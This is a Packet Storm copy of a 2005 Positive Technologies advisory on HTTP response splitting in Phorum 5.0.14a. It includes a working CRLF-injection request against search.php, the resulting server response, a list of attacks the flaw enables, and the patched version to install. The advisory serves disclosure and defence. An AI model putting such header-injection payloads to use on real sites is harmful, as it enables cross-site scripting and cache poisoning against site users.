what you don't know can hurt you

phorumSplit.txt

phorumSplit.txt
Posted Mar 24, 2005
Authored by Positive Technologies

Input passed to the Location parameter in Phorum version 5.0.14a is not properly sanitized. This can be exploited to inject malicious characters into HTTP headers and may allow execution of arbitrary HTML and script code in a user's browser session in context of an affected site.

tags | exploit, web, arbitrary
MD5 | 4d491615838f77f878772ef8e845540e

phorumSplit.txt

Change Mirror Download


[ Positive Technologies SA-20050322 ]
Phorum "location" HTTP Response Splitting Vulnerability.

Release Date: 03/22/2005
Date Reported: 03/10/2005
Severity: Medium
Application: Phorum
Platform: PHP
Vendor: http://www.phorum.org
Affects versions: 5.0.14a
Other versions may also be affected.


I. BACKGROUND

Phorum is a web based message board written in PHP. Phorum is designed
with high-availability and visitor ease of use in mind. Features such
as mailing list integration, easy customization and simple installation
make Phorum a powerful add-in to any website.


II. DESCRIPTION

Input passed to the "Location" parameter is not properly sanitised.
This can be exploited to inject malicious characters into HTTP headers
and may allow execution of arbitrary HTML and script code in a user's
browser session in context of an affected site.


Request:
http://[server]/phorum5/search.php?forum_id=0&search=1&body=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d%0a<html>Scanned by PTsecurity</html>%0d%0a&author=1&subject=1&match_forum=ALL&match_type=ALL&match_dates=30


Result:

HTTP/1.1 302 Found
Date: Tue, 01 Mar 2005 12:33:53 GMT
Server: Apache/1.3.31 (Unix) PHP/4.3.10
X-Powered-By: PHP/4.3.10
Location: http://[server]/phorum5/search.php?0,search=1,page=1,match_type=ALL,match_dates=30,match_forum=ALL,body=
Content-Length: 0

HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 34

<html>Scanned by PTsecurity</html>
,author=1,subject=1
Connection: close
Content-Type: text/html

<...>


This vulnerability was discovered by Positive Technologies using MaxPatrol
(www.maxpatrol.com) - intellectual professional security scanner. It is able to detect a substantial amount of vulnerabilities not published yet.
MaxPatrol's intelligent algorithms are also capable to detect a lot of
vulnerabilities in custom web-scripts (XSS, SQL and code injections, HTTP Response splitting).

The vulnerability has been reported in Phorum version 5.0.14.
Other versions may also be affected.


III. ANALYSIS

Exploitation of this vulnerability allows remote attackers to mount various
kinds of attacks. For example: Cross-Site Scripting (XSS), Web Cache
Poisoning (deface), Browser cache poisoning, Hijacking pages with
user-specific information and etc...


IV. SOLUTION
Update to version 5.0.15a.

http://phorum.org/story.php?48
http://phorum.org/downloads/phorum-5.0.15a.tar.gz

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    60 Files
  • 2
    Apr 2nd
    20 Files
  • 3
    Apr 3rd
    10 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    0 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    0 Files
  • 9
    Apr 9th
    0 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close